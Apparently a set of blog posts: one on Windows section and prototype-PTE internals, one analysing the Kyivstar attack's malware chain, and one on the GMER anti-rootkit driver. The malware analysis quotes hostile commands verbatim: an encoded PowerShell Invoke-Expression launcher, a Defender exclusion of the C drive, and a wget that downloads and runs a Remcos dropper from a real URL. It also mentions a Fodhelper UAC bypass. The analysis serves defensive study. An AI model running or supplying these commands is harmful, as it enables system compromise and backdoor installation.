Subsection (_SUBSECTION) is a data structure containing the information necessary to calculate file offsets for the mapped file using the PPTEs. In case of a binary mapping type, there's only one subsection, but if the file is mapped as executable, then there are as many subsections as there are sections in the executable (plus one for the PE header). Since all the PTEs describing a subsection have the same page protection bits (copy-on-write, read only, etc), it is logical to maintain one data structure for all these PTEs. This data structure is called a Subsection. All PPTEs of a subsection point to the same corresponding Subsection structure for both binary and executable mapping types. Moreover, the subsection contains the starting sector of the PE section. It's taken from the PE header as Raw_section_offset/SECTOR_SIZE. The subsection also stores a pointer to the first PPTE in the segment's PPTE table and the number of PTEs for this subsection (i.e. the number of virtual pages for this PE section, its VirtualSize rounded up to a multiple of PAGE_SIZE). Having the address of the structure (executable mapping type), we can easily calculate the offset in the PE file that a given PPTE describes (from the distance between the base and current PTEs). If Pte is a pointer to a PPTE, then the formula is:

((((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / sizeof(PTE)) << PAGE_SHIFT) + Subsection->StartingSector * SECTOR_SIZE

or for x86

((((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / 4) << 12) + Subsection->StartingSector * SECTOR_SIZE

If Subsection is a pointer to the subsection, then the first PTE that describes it is FirstPte = &Subsection->SubsectionBase[0], and its boundary is LastPte = &Subsection->SubsectionBase[Subsection->PtesInSubsection]. I.e. if Pte is a pointer to a PPTE that belongs to this subsection, then &Subsection->SubsectionBase[0] <= Pte < &Subsection->SubsectionBase[Subsection->PtesInSubsection].
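
The range check can be expressed as a short C function. It's a sketch with hypothetical names that works on raw 32-bit addresses instead of the real kernel structures and assumes 4-byte PTEs (x86 without PAE).

```c
#include <stdbool.h>
#include <stdint.h>

#define PTE_SIZE 4u  /* sizeof(MMPTE) on x86 without PAE */

/* True if the PPTE at address 'pte' belongs to the subsection whose first
   PPTE is at 'subsection_base' and which owns 'pte_count' PPTEs. */
bool ppte_belongs_to_subsection(uint32_t pte, uint32_t subsection_base,
                                uint32_t pte_count)
{
    uint32_t first = subsection_base;
    uint32_t end   = subsection_base + pte_count * PTE_SIZE;  /* one past the last PPTE */

    return pte >= first && pte < end;
}
```

For a subsection with Base Pte e172ef8c and two PTEs, the addresses e172ef8c and e172ef90 pass the check, while e172ef94 already belongs to the next subsection.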

Exploring the Segment structure

Unlike the Control Area structure, which is designed to perform I/O operations with a file, the Segment stores information about a PE file that was taken from its PE header. In case of a binary file, this data isn't used. According to its purpose, a Segment also stores the Proto-PTE table (array) that addresses the offsets from the beginning of the mapped file through the Subsection structures. For example, if the VMM needs to load file data from the mapped file into virtual memory, it locates the corresponding Proto-PTE entry in the Segment table via the invalid hardware PTE in the page table that caused the page fault. Next, using the Control Area structure and the calculated file offset, the VMM reads data from the file into virtual memory.

MmCreateSection creates segments using the following functions. It happens only if the file is mapped for the first time, otherwise the function gets a pointer to it via FileObject. Note that no matter how many sections have been created for the file object, there's always only one segment structure per type of mapping (binary, executable) for all of them. The same applies to Control Area structures, there's only one Control Area per type of mapping regardless of the number of created sections.

NTSTATUS MiCreateImageFileMap (IN PFILE_OBJECT File, OUT PSEGMENT *Segment)

NTSTATUS MiCreateDataFileMap (IN PFILE_OBJECT File, OUT PSEGMENT *Segment, IN PUINT64 MaximumSize, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN ULONG IgnoreFileSizing)

As you can see, MiCreateImageFileMap accepts fewer arguments, because it reads all the necessary information from the PE header of the executable file to be mapped. You can find the descriptions of the other arguments in NtCreateSection.

The following structure describes Segment.

ControlArea - pointer to the corresponding CA.
TotalNumberOfPtes - roughly mapped_file_size/PAGE_SIZE.
SizeOfSegment - size of the structure in bytes. MiCreateImageFileMap calculates it as SizeOfSegment = sizeof(SEGMENT) + (sizeof(MMPTE) * ((ULONG)TotalNumberOfPtes - 1)) + sizeof(SECTION_IMAGE_INFORMATION).
PrototypePte - pointer to an array of PPTE. In fact, it's NewSegment->PrototypePte = &NewSegment->ThePtes[0].
ThePtes - an array of PPTE, PPTE page table.

Perhaps the following image gives you a better understanding.

Behind the curtain of Section PTEs

As was mentioned many times earlier, PPTEs and the hardware PTEs pointing to them are the key to properly understanding how virtual addresses are translated for mapped sections. The difference between them is that the first is stored in the Segment object, while the second is stored in the process's page table (hardware PTE). Both can be in two major states, valid and invalid (the P bit in the structure). A zeroed bit means that the mapped page is absent from physical memory and signals the VMM that its content should be read from disk. If the P bit is set, the virtual page is resident in physical memory and no additional actions are required from the VMM. The invalid PTE has a flag signaling that this PTE points to a PPTE, i.e. belongs to a memory-mapped file. Once a thread tries to access an invalid memory page, a page fault exception occurs and the VMM exception handler analyzes the PTE to learn what kind of page it describes. There are several types of invalid PTEs, but we won't discuss this topic here. Also note that in case of a resident virtual page the VMM stores a pointer to the PPTE and its value in the PFN database. Let's take a look at the format of these structures. You can see the format of the PTE pointing to a PPTE in the following picture.

Once you get the PrototypeIndex, you can calculate the PPTE address with this formula: PrototypePteAddress = MmPagedPoolStart + (PrototypeIndex << 2).
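
Here's a C sketch of this calculation. Note that the bit layout is an assumption on my side: as far as I remember from the WRK sources for x86 without PAE, the index is split into a low 7-bit part (bits 7..1) and a high 21-bit part (bits 31..11), with bit 10 marking the PTE as pointing to a PPTE. The function names are hypothetical, and the paged pool start is passed in as a parameter.

```c
#include <stdint.h>

/* Assumed layout of an invalid PTE pointing to a PPTE (x86 without PAE):
   bit 0 = valid (0), bits 7..1 = low part of the index,
   bit 10 = prototype flag, bits 31..11 = high part of the index. */
uint32_t ppte_address_from_pte(uint32_t pte, uint32_t paged_pool_start)
{
    uint32_t high  = pte >> 11;            /* 21-bit high part */
    uint32_t low   = (pte >> 1) & 0x7Fu;   /* 7-bit low part */
    uint32_t index = (high << 7) | low;    /* PrototypeIndex */

    return paged_pool_start + (index << 2);
}

/* Inverse operation, only used to build sample values for the sketch. */
uint32_t make_pte_for_ppte(uint32_t ppte_address, uint32_t paged_pool_start)
{
    uint32_t index = (ppte_address - paged_pool_start) >> 2;

    return ((index >> 7) << 11) | (1u << 10) | ((index & 0x7Fu) << 1);
}
```

The second function exists only to build test values; taking 0xE1000000 as the paged pool start (an assumed value), encoding the PPTE address 0xE172EF58 and decoding it again returns the same address.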

Below you can see PPTE format.

SubsectionAddress = MmSubsectionBase + (SubsectionIndex << 3), where SubsectionIndex is assembled from the subsection address bits of the PPTE. MmSubsectionBase is usually equal to MmNonPagedPoolStart, because the WhichPool bit is usually set to 1.

Now, using our knowledge, we can put all the pieces together and make a complete picture of the actions for getting file data when a thread tries to access a virtual page belonging to a mapped file.

A little practice

Let's get to the Proto-PTE table. Take a random process, dump its basic information and go to the table.

We can go a bit deeper and calculate the offsets manually. To explore these structures it's better to take information from the cache slots, because for usual user-mode processes the kernel can delay the creation of the Proto-PTE table until a thread addresses the mapped file data. I got a list of the cache slots on my system and selected one describing the registry hive file NTUSER.DAT. Since it's a data file, there's only one subsection for its Control Area.

Now we can calculate the file offset starting from which the file is mapped to the cache slot using this formula.

FileOffset_LSN = ((((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / 4) << 12) + Subsection->StartingSector * SECTOR_SIZE

((0xE15B7208 - 0xE15B7008) / 4) * 0x1000 + 0 = 0x80000; you can see this value in the VACB structure above (Offset: 0x00080000).
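The same arithmetic can be sketched in a few lines of Python. The function and constant names are my own; the 4-byte PTE size, 4 KB page and 512-byte sector match the numbers used in the formula above.

```python
PTE_SIZE = 4         # bytes per prototype PTE, per the formula above
PAGE_SHIFT = 12      # 4 KB pages
SECTOR_SIZE = 0x200  # 512-byte sectors


def file_offset(pte: int, subsection_base: int, starting_sector: int) -> int:
    """File offset of the page described by the PPTE located at address `pte`."""
    page_index = (pte - subsection_base) // PTE_SIZE
    return (page_index << PAGE_SHIFT) + starting_sector * SECTOR_SIZE


if __name__ == "__main__":
    # Values from the NTUSER.DAT cache slot example.
    print(hex(file_offset(0xE15B7208, 0xE15B7008, 0)))
```

With the values from the example, the page index is 0x80 and the resulting offset is 0x80000, which is the value shown in the VACB.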

Here's another example.

Now look at a more interesting case with PE files, whose Control Area has more than one subsection (one subsection per PE section). We can simplify our task and skip the first steps, starting with Control Areas. The !memusage command can help us.

We can see the addresses of the Control Area structures in the first column. Print it for ole32.dll.

For clarity, copy the results to the table. If we open the PE file in the Cerbero PE Insider tool, we'll see that it has five sections. Note that the first subsection is allocated for the PE header.

We can see that subsections 2-3 are executable and match the PE sections .text and .orpc. This means that they address the PPTEs with code sections. The 4th subsection describes global data and has copy-on-write protection. The rest are only available for read access.
The first subsection describes the file header and starts at offset 0. On disk, the PE header fits in two sectors and occupies one page of virtual memory. Thus, it can be described by one PPTE.
The second subsection describes the PE file's first code section. It starts from the second sector (0x400 / SECTOR_SIZE == 2). The virtual size of this section is 0x11EF5E; rounded up to a multiple of the page size it is 0x11EF5E + 0xA2 = 0x11F000, and 0x11F000 / PAGE_SIZE = 0x11F. This value matches the number of PTEs in the subsection. We can calculate the number of sectors for the section from the raw size in the header: 0x11F000 / 0x200 = 0x8F8.
The third subsection also contains code and starts at sector 0x11F400 / 0x200 = 0x8FA. The size is 0x6000 bytes (in this case we take the physical size as it is larger than the virtual one), 0x6000 / 0x1000 = 6 PTEs.
The 4th subsection starts at sector 0x125400 / 0x200 = 0x92A, size 0x7000 / 0x1000 = 7 PTEs.
The 5th subsection starts at sector 0x12BA00 / 0x200 = 0x95D, size 0x2000 / 0x1000 = 2 PTEs.
The 6th subsection starts at sector 0x12D200 / 0x200 = 0x969, size 0xE000 / 0x1000 = 0xE PTEs.
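The calculations above are easy to double-check with a short Python sketch. The helper names are hypothetical; the raw offsets and sizes are the ones quoted in the text for ole32.dll.

```python
SECTOR_SIZE = 0x200
PAGE_SIZE = 0x1000


def start_sector(raw_offset: int) -> int:
    """Sector at which a PE section starts in the file."""
    return raw_offset // SECTOR_SIZE


def pte_count(size: int) -> int:
    """Number of PPTEs needed to cover `size` bytes (rounded up to whole pages)."""
    return (size + PAGE_SIZE - 1) // PAGE_SIZE


# (raw file offset, size in bytes) for subsections 2-6, as quoted in the text
SUBSECTIONS = [
    (0x400, 0x11EF5E),
    (0x11F400, 0x6000),
    (0x125400, 0x7000),
    (0x12BA00, 0x2000),
    (0x12D200, 0xE000),
]

if __name__ == "__main__":
    for number, (offset, size) in enumerate(SUBSECTIONS, start=2):
        print(number, hex(start_sector(offset)), hex(pte_count(size)))
```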

Let's check the formula mentioned above in practice. Take the third subsection, which describes the ole32.dll section starting at sector 0x8FA.

Dispatching #PF exceptions for mapped files

As we know, the I/O Manager and VMM minimize performance overhead by performing most of their operations asynchronously and on demand. Windows application developers may be unaware of this principle, because synchronous operations are the default behavior of the Windows API, while the situation with the Native and kernel APIs is reversed. This principle also applies to section objects. When the MapViewOfFile Windows API returns control to the calling thread, it doesn't mean that the mentioned subsystems have copied the file data to virtual memory. Likewise, if a thread modifies the mapped file data in virtual memory, it doesn't mean that these changes will be immediately flushed to the physical file. Instead, the VMM delays the actual I/O operation until a thread of the process tries to access the file data by reading virtual memory. Once that happens, a #PF exception occurs and the VMM initiates an I/O operation to read file data into virtual memory. Most of the work in this case falls on the shoulders of the MiDispatchFault function.

There are several possible situations for sections describing file-backed data. Note that the section PPTE can be in the same states as a hardware PTE.

The PPTE is invalid and points to a subsection. In this case, the VMM needs to load the corresponding file data from disk into physical memory. The MiResolveMappedFileFault function is responsible for this, but the actual I/O operation is initiated by MiDispatchFault.
The PPTE is valid and points to a page frame. The VMM just needs to fill the hardware PTE with this frame number.
The PPTE is marked as copy-on-write.

MiDispatchFault calls MiResolveProtoPteFault, passing it pointers to the PTE and the PPTE. MiResolveProtoPteFault works with a PPTE just as with a usual PTE, because a PPTE can be in the same states as a hardware PTE. The function starts by validating the PPTE, i.e. checking whether it's located in physical memory or not.

After checking the access rights to the page, the function checks the case when the PPTE is marked as Demand Zero and its hardware PTE is marked as copy-on-write. In this case, the VMM resolves the fault by calling MiResolveDemandZeroFault and passing it a pointer to the real PTE. Further, MiResolveProtoPteFault makes the PPTE valid; it can be in the following states: Demand Zero, Transition, Page File, Pagefile-backed, File-backed.

The MiResolveProtoPteFault and MiResolveMappedFileFault functions perform important steps: they reserve a page frame (physical page), initialize the corresponding entry in the PFN database, and prepare an MDL structure and a special ReadBlock structure for the subsequent disk read operation. You can see the entire process in the following diagram.

Inside the Page Writers

In the last part of this blog post we're gonna discuss the Mapped Page Writer subsystem (thread), which is a part of the Modified Page Writer subsystem (or just thread). At this point we already know how the VMM and I/O manager read mapped file data into a process's virtual memory in order to provide access to it. But what about writing file data? As mentioned above, the VMM minimizes performance overhead by performing its operations that involve disk I/O on demand. That's why the actual read operation on a memory mapped file only happens when a thread tries to access a file view and not when executing MapViewOfFile.

The VMM has two system threads called MiModifiedPageWriter and MiMappedPageWriter. In fact, MiModifiedPageWriter just creates MiMappedPageWriter thread and shifts the rest of work to MiModifiedPageWriterWorker. These last two functions (MiModifiedPageWriterWorker and MiMappedPageWriter) are two infinite loops that can be called Modified Page Writer, because they implement all its functionality. The first one is responsible for gathering information about modified pages belonging to the page file (MiGatherPagefilePages) and about modified pages belonging to the mapped files (MiGatherMappedPages). It also adjusts the frequency of the flushing operations or how often modified pages will be written to disk. The second thread takes the information prepared by MiModifiedPageWriterWorker and performs the actual disk write operation (for mapped files).

The main part of MiModifiedPageWriterWorker is an infinite loop that waits on the MiMappedPagesTooOldEvent event. This event can be set in several circumstances and adjusts the frequency of flushing. To provide a fixed flushing frequency, the VMM uses a timer object and a DPC object (MiModifiedPageWriterTimerDpc), i.e. the DPC handler MiModifiedPageWriterTimerDispatch is called every time the timer expires. Since this handler is executed at the high IRQL DISPATCH_LEVEL (2, the scheduler level), the system ensures its operation in privileged mode. The MmInitSystem function initializes this object during system startup, and when MiModifiedPageWriterWorker needs to gather dirty memory pages for the first time, it sets this timer. The timer is set for 3 seconds.

I forgot to mention that physical memory pages (frames) that were modified since the section was mapped are called Dirty. The CPU sets the Dirty bit in the PTE on the first write operation to the page. Once the VMM processes this page in a certain way, it resets this bit. Without it, the VMM wouldn't be able to track the changes made by the thread on the mapped page and synchronize them with the file data on disk.

For convenience and to reduce overhead, MiMappedPageWriter doesn't flush every dirty page separately. Instead, MiGatherMappedPages gathers into a packet (MMMOD_WRITER_MDL_ENTRY) a set of dirty frames that belong to the same section and are adjacent to the current dirty frame. The MMMOD_WRITER_MDL_ENTRY structure describes a set of dirty PFNs that should be written to disk. In fact, the VMM uses two MDL lists, one for the paging file and another for sections. The pool of these MDL items is allocated in the NtCreatePagingFile function, which is responsible for creating page files. The same goes for memory mapped files: MmMappedFileHeader.
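The idea of batching adjacent dirty pages can be illustrated with a small Python sketch. This is not the MiGatherMappedPages algorithm, only a toy model of the clustering idea: it assumes the dirty pages of one section are given as page indexes and groups neighbours into (first page, page count) runs, each of which could then be written with a single I/O request.

```python
from typing import Iterable, List, Tuple


def cluster_dirty_pages(dirty_pages: Iterable[int]) -> List[Tuple[int, int]]:
    """Group dirty page indexes of one section into runs of adjacent pages.

    Returns a list of (first_page, page_count) tuples.
    """
    runs: List[Tuple[int, int]] = []
    for page in sorted(set(dirty_pages)):
        if runs and page == runs[-1][0] + runs[-1][1]:
            # The page directly follows the current run: extend it.
            first, count = runs[-1]
            runs[-1] = (first, count + 1)
        else:
            # A gap was found: start a new run.
            runs.append((page, 1))
    return runs


if __name__ == "__main__":
    print(cluster_dirty_pages([7, 3, 4, 5, 9, 10]))
```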

As mentioned above, MiMappedPageWriter is responsible for initiating the disk write operation. Here's its pseudocode, with the details omitted.

Please take a look at the following diagram to understand the entire process.

However, a thread can force the VMM to write modified data to disk immediately. Windows API provides applications with the FlushViewOfFile function. The VMM's internal function MiFlushSectionInternal is responsible for flushing section data and calls IoAsynchronousPageWrite to perform disk write operation.
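From user mode, a forced flush looks roughly like the following Python sketch. It relies on the standard mmap module, whose flush() method is implemented on Windows through FlushViewOfFile (and through msync on Unix-like systems); the file name, offset and helper names are hypothetical.

```python
import mmap
import os
import tempfile


def patch_mapped_file(path: str, offset: int, data: bytes) -> None:
    """Modify a file through a mapped view and flush the dirty pages right away."""
    with open(path, "r+b") as f:
        with mmap.mmap(f.fileno(), 0) as view:
            view[offset:offset + len(data)] = data  # dirties the mapped page
            view.flush()                            # ask the OS to write it back now


def demo() -> bytes:
    """Create a one-page file, patch it via a mapping and read the bytes back."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "mapped.bin")
        with open(path, "wb") as f:
            f.write(bytes(4096))
        patch_mapped_file(path, 16, b"dirty")
        with open(path, "rb") as f:
            f.seek(16)
            return f.read(5)


if __name__ == "__main__":
    print(demo())
```

Without the explicit flush the data would still reach the file eventually, but the moment of the actual write would be left to the page writers described above.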

Instead of conclusion

Thank you for your attention, and I hope you enjoyed the blog post. Windows Sections is quite a difficult topic, especially for beginners, because you should already have an idea of other Windows kernel subsystems to understand it properly.

If you have any comments or remarks, please let me know and feel free to contact me. I'm going to cover several other topics on the Windows VMM internals such as the PFN database, hyperspace and virtual address translation.

↧

Ky1vstar cyberattack - under the hood of the malicious scripts

April 5, 2024, 5:15 am

The attack overview

In mid-December, it was revealed that a devastating cyberattack hit Ukraine's biggest telecommunications company. The attack disabled the company's services for days (!), leaving over twenty million Ukrainians without mobile communication and internet access.

Ukrainian officials described the attack as having disastrous consequences, causing the complete destruction of the telecoms operator's core infrastructure. The attackers managed to wipe out nearly all data, including thousands of virtual servers and PCs.

Below, you can see the attack chain, which begins with receiving a phishing email containing a malicious .zip attachment with a .doc file inside.

email => attach1.zip => attach1.rar + attach2.rar => attach.rar (password protected) => .doc (vba) => SMB \\89_23_98_22\LN\GB.exe => powershell bitbucket_org/.../wsuscr.exe

The .doc file merely shows a picture that prompts the potential victim to enable editing and content - in other words, to lower security settings and permit the execution of a malicious macro.

To evade anti-malware checks on the email server and victim's system, the doc file is packed into a multi-layered, password-protected archive. It contains a VBA macro that initiates the infection process by executing the malware downloader.

Below you can see the detailed (trimmed for clarity) execution flow.

As you can see, the attackers actively use cmd and PS scripts to initiate malicious actions from trusted processes. These scripts are either fully or partially encoded and may contain packed data. To run PS scripts from cmd, the following command construction is used.

powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('...')) | Invoke-Expression"

To evade detection, the PS script to be executed is base64 encoded. The batch file passes the encoded script to PowerShell, instructing it to decode it on-the-fly via the command line rather than saving the script to disk.
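For analysis purposes, such payloads can be decoded offline without running PowerShell. Below is a minimal Python sketch that mirrors the command construction above: base64-decode the string, then interpret the bytes as UTF-16LE (which is what [System.Text.Encoding]::Unicode means in .NET). The function names are my own.

```python
import base64


def decode_ps_payload(encoded: str) -> str:
    """Decode a base64 string the way the batch file's PowerShell one-liner does."""
    return base64.b64decode(encoded).decode("utf-16-le")


def encode_ps_payload(script: str) -> str:
    """Inverse operation, handy for building test samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


if __name__ == "__main__":
    sample = encode_ps_payload("Write-Host 'hello'")
    print(sample)
    print(decode_ps_payload(sample))
```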

Exploring the scripts

After decompressing the final RAR archive, the victim opens the malicious .doc file containing a malicious VBA macro. We can extract it using two tools: Frank Boldewin's OfficeMalScanner and Didier Stevens' oledump. Let's take a look at both.

> OfficeMalScanner.exe C:\Test\malicious.doc info

This command dumps macros into the MALICIOUS.DOC-Macros folder. The oledump.py script depends on the olefile Python module, so we need to install it first using the "pip install olefile" command.

Next, dump the document structure.

We're interested in the streams marked with M, where macros are stored in a compressed state. The following command decompresses the macro located in the 9th stream.

oledump.py -s 9 --vbadecompressskipattributes C:\Test\malicious.doc >C:\Test\s9_malicious_doc.txt

This macro, shown in the picture below, serves only one purpose: to download and run the malware downloader GB.exe from the SMB share. Before doing so, it also opens the shared folder in a new Explorer window and closes it after execution.

The process tree.

The downloader GB.exe drops the res.bat and executes commands from it.

:: Copy test2.exe from the share to the local folder without any messages

echo f | xcopy /s test2.exe "%temp%\persistent2\test2.exe">NUL

:: Execute an encoded PS script

powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgAA==')) | Invoke-Expression"

This bat file copies another executable, test2.exe, from the share and executes an encoded PS script. The bypass commands within the script body are packed.

This PS script implements an interesting UAC bypass trick using the Fodhelper binary in just three commands. Consequently, it executes the downloaded Remcos executable with elevated privileges. The unpacked cmd elevation commands appear as follows.

As we can see from the malware execution flow pic above, the downloader also runs another executable, test2.exe, in addition to executing res.bat.

> cmd.exe /c res.bat && test2.exe

This test2 executable runs another interesting batch file named test2.bat.

It runs another PS script designed to add the entire C drive to Defender's exclusion list, which requires admin rights. As usual, the commands are base64 encoded.

$pwd = "Add-MpPreference -ExclusionPath C:\"

$pwd | Invoke-Expression

This execution chain ends with the launch of the Remcos dropper named wsuscr.exe from the aforementioned PS script.

wget "https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exe" -outfile "$env:APPDATA\wsuscr.exe"

Invoke-Expression -Command "$env:APPDATA\wsuscr.exe"

Remcos serves as a backdoor, granting attackers full access to the compromised system.

References

https://cert.gov.ua/article/6276824

https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1

https://www.joesandbox.com/analysis/1365471/0/html

https://www.reuters.com/world/europe/russian-hackers-were-inside-ukraine-telecoms-giant-months-cyber-spy-chief-2024-01-04/

https://www.hybrid-analysis.com/sample/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/658988e479a329c125013938

https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

↧

GMER - the art of exposing Windows rootkits in kernel mode

April 5, 2024, 1:10 pm

📌 Chapters:

Introduction
Some basic terms
Howto
Exploring Win11 disk subsystem
Set up a secure environment
Overview of the driver
Patching kernel data
Securing disk I/O operations
Securing file I/O operations
Tracing kernel mode code
About PPL'ed processes

📝 Introduction

GMER is a well-known powerful anti-rootkit tool, which has been used for years by Windows IT pros to detect the presence of rootkits in the system. A rootkit is a kind of malicious software intended to hide the components and artifacts of malware. Historically, rootkits can be divided into two types: user mode (Ring 3) and kernel mode (Ring 0). Nowadays, there are also malicious implants designed to work at the hypervisor (Ring -1) and SMM (Ring -2) privilege levels. We're gonna focus on the most common type, the kernel mode rootkit, and will simply refer to it as a rootkit.

Rootkits were popular in the Windows x86 era, when there were no restrictions on intercepting anything in privileged kernel mode. Typically, rootkits use three types of techniques: hooking, patching, and DKOM. We won't delve into them in detail, but it's worth noting that the first one is used to replace a pointer to the necessary function in a function table, the second involves inline code patching and the third is used to modify members of kernel objects such as KTHREAD or EPROCESS.

The authors of other well-known anti-rootkits have dropped their support due to the growing dominance of the x64 platform and the emergence of new Windows versions. The restrictions imposed on kernel mode code on this platform have affected not only rootkits but also anti-rootkits. Rootkits have lost the ability to gain control over the system making anti-rootkit checks useless. Nevertheless, some rootkits were able to bypass the new security perimeter by rebooting the system with the test signing bootloader option. One of them was Necurs, along with several other bootkits.

Unlike other anti-rootkits, GMER has an x64 version of the driver, although it doesn't support modern versions of Windows. It has an impressive arsenal of clever tricks for detecting the presence of rootkits and unhooking them, which can still be useful nowadays. Since malware aims to detect the launch of GMER, the tool drops the driver to disk with a random name and deletes it once it's loaded. This way, the malware can't block its loading. Within the tool, the driver, which is located in the resource section, is packed twice: the tool itself is packed with UPX and its unpacked version stores the compressed driver. The tool's executable is also written to disk with a random name.

📖 Some basic terms

Anti-rootkit - a standalone tool/utility or component within a security product that is designed to deeply inspect Windows environment at both user and kernel mode levels to detect system anomalies.

Direct Kernel Object Manipulation (DKOM) - a rootkit technique that means modification of Windows kernel objects through direct access to them without any API.

Disk driver - a Windows driver called disk.sys that is responsible for processing disk I/O operations usually coming from the partition manager (PartMgr.sys), volume manager (Volmgrx.sys) or any other clients via \PhysicalDriveX objects. In fact, the classpnp.sys driver dispatches all disk.sys driver requests.

Disk port driver - while disk.sys implements a high-level logic of communication with various disk types connected to different interfaces, the disk port driver is designed to communicate with a specific disk device. There are several common disk port drivers such as atapi.sys, scsiport.sys, ataport.sys, storport.sys.

🔬 Howto

To extract the driver, the dropper should first be unpacked. The driver inside the resource section of the dropper is compressed with zlib. To decompress it, I simply used the built-in VirusTotal decompressor. In the Relations tab, you can find a link to the report with the decompressed driver.

C:\test>upx -d -o C:\test\gmer\gmer_unpacked.exe C:\test\gmer\gmer.exe

To make the analysis process faster, I ran GMER on my Win7 SP1 x64 VM and took a kernel memory dump. Since the dump contains the driver with already initialized variables and decrypted text strings, we can determine the purpose of each pointer in the disassembled version of the driver. Next, we need to rebase the driver loaded into IDA so that the offsets of both drivers are identical.

Edit->Segments->Rebase program...

🔐 Set up a secure environment

Any anti-rootkit shouldn't trust the environment in which it works. Members of kernel mode objects, pointers in dispatch tables, the integrity of the WinNT kernel executable, and drivers - all this stuff may already be compromised before an anti-rootkit is launched.

A secure environment means a set of artifacts such as kernel object pointers, their values, kernel function pointers, that have been retrieved or restored in a secure way and are suitable for further use.

GMER takes the following actions to initialize its own secure environment in DriverEntry.

Constructs on the stack the names of the driver objects of interest, such as \Filesystem\Ntfs, \Driver\Disk, \Driver\atapi.
Selects kernel object offsets depending on the OS version, including EPROCESS.Peb, EPROCESS.UniqueProcessId, KPROCESS.ThreadListHead, ETHREAD.StartAddress, etc.
In case of an unknown Windows version, obtains those offsets through manual analysis of the appropriate ntoskrnl functions, such as PsGetProcessPeb, PsGetProcessSectionBaseAddress, etc.
Dynamically resolves some important imports such as IofCompleteRequest and IofCallDriver using MmGetSystemRoutineAddress.
Maps the NT layer DLL ntdll.dll, which is used later to get additional information.
Obtains the start addresses of the loaded Ntfs.sys and Fastfat.sys, locates their entry points and scans them for a specific signature to retrieve the real addresses of their IRP_MJ_CREATE handlers.
Gets information about the loaded ataport.sys and scsiport.sys. These drivers are responsible for low-level disk communication.
Uses its own PE export parser to get the addresses of the sensitive functions listed below.

GMER obtains most of the kernel object offsets by analyzing the following functions.

The following driver function looks up most of the offsets, relying on the simple structure of the beginning of those functions.

The situation varies when it comes to finding the corresponding EPROCESS and ETHREAD fields used to collect information about threads, as different Windows versions use a different number of lists.

GMER obtains the addresses of nt!Zw exports (services) in a tricky way. First, it obtains the KeServiceDescriptorTable address by finding an 8-byte signature "8B F8 C1 EF 07 83 E7 20" and two other values in ntoskrnl, which represent the following instructions inside the KiSystemServiceStart function. As a starting point, it takes the address of the nt!strnicmp function and scans from there up to the KdDebuggerNotPresent variable.
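The signature search itself is straightforward and can be modelled offline on a dumped image. The Python sketch below only looks for the 8-byte signature quoted above inside a given range of a byte buffer; the buffer, the range boundaries and the function name are assumptions, and the two additional values that GMER checks are not modelled.

```python
SIGNATURE = bytes.fromhex("8B F8 C1 EF 07 83 E7 20")


def find_signature(image: bytes, start: int, end: int,
                   signature: bytes = SIGNATURE) -> int:
    """Return the offset of `signature` fully inside image[start:end], or -1."""
    return image.find(signature, start, end)


if __name__ == "__main__":
    # Synthetic buffer standing in for the bytes between the two symbols.
    fake_image = b"\x90" * 16 + SIGNATURE + b"\xCC" * 8
    print(find_signature(fake_image, 0, len(fake_image)))
```

In the usage example the start and end arguments stand in for the offsets of strnicmp and KdDebuggerNotPresent within the image.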

The disposition of the target ntoskrnl functions.

To obtain the address of a specific ntoskrnl!Zw function, it maps Ntdll and retrieves from it the address of the required export function. Next, it grabs the System Service Number (SSN) from the second instruction of the export, which has the same form in all of them: mov eax, SSN (B8 3F 00 00 00).

With these pieces together, the process of obtaining ntoskrnl exports for Zw services looks as follows:

Get the export function address from the mapped Ntdll.
Take the SSN from the second instruction of the function.
Use this SSN as an index into the KeServiceDescriptorTable.KiServiceTable array and calculate the appropriate Zw function address. Note that the pointers in this array are protected by PatchGuard.
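The second step can be sketched in Python as follows. The sketch assumes the usual x64 Ntdll stub layout, where the first instruction is mov r10, rcx (4C 8B D1) and the second one is mov eax, imm32 (B8 followed by the 32-bit SSN); the function name is hypothetical and the table lookup from the third step is not modelled.

```python
import struct

MOV_R10_RCX = bytes.fromhex("4C 8B D1")  # assumed first instruction of the stub
MOV_EAX_IMM32 = 0xB8                     # opcode of mov eax, imm32


def extract_ssn(stub: bytes) -> int:
    """Return the System Service Number encoded in an x64 Ntdll service stub."""
    if len(stub) < 8 or not stub.startswith(MOV_R10_RCX):
        raise ValueError("unexpected stub prologue")
    if stub[3] != MOV_EAX_IMM32:
        raise ValueError("second instruction is not mov eax, imm32")
    # The immediate operand is a little-endian 32-bit value.
    return struct.unpack_from("<I", stub, 4)[0]


if __name__ == "__main__":
    print(hex(extract_ssn(bytes.fromhex("4C 8B D1 B8 3F 00 00 00"))))
```

A stub that doesn't match the expected layout (for example, one that was hooked in user mode) makes the function raise an error instead of returning a bogus number.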

An interesting fact is that when scanning ntoskrnl data between strnicmp and KdDebuggerNotPresent to find the address of KeServiceDescriptorTable, the driver doesn't validate the current pointer with MmIsAddressValid. Since the space between these symbols belongs to multiple ntoskrnl sections, one of them may be INIT, which may be already discarded from memory.

📖 Overview of the driver

The driver provides its user mode counterpart with various valuable interfaces aimed at obtaining trustworthy data about the Windows environment. These features are available via the appropriate IOCTL codes listed below. After obtaining the necessary data, GMER compares it with the data obtained through the regular Windows API and reports the detected anomalies to the user.

Basically, to supply the requested data, the driver leverages Windows kernel API, low-level disk and file system access skipping the intermediate filters, DKOM and custom implementation of some Windows kernel functions.

During initialization, the driver creates a separate thread to execute the following operations in the System process context: shutdown system, read process memory, suspend thread, query information about thread, process, system, and system registry. When the GMER's DeviceIoControl handler, which is executed in the current process context, recognizes one of those IOCTLs, it builds the context structure with a pointer to a specific handler and sets the appropriate event that triggers another thread to execute it.

📚 Exploring Win11 disk subsystem

Before we start discussing the topic, let's take a look at some basic aspects of Windows disk subsystem.

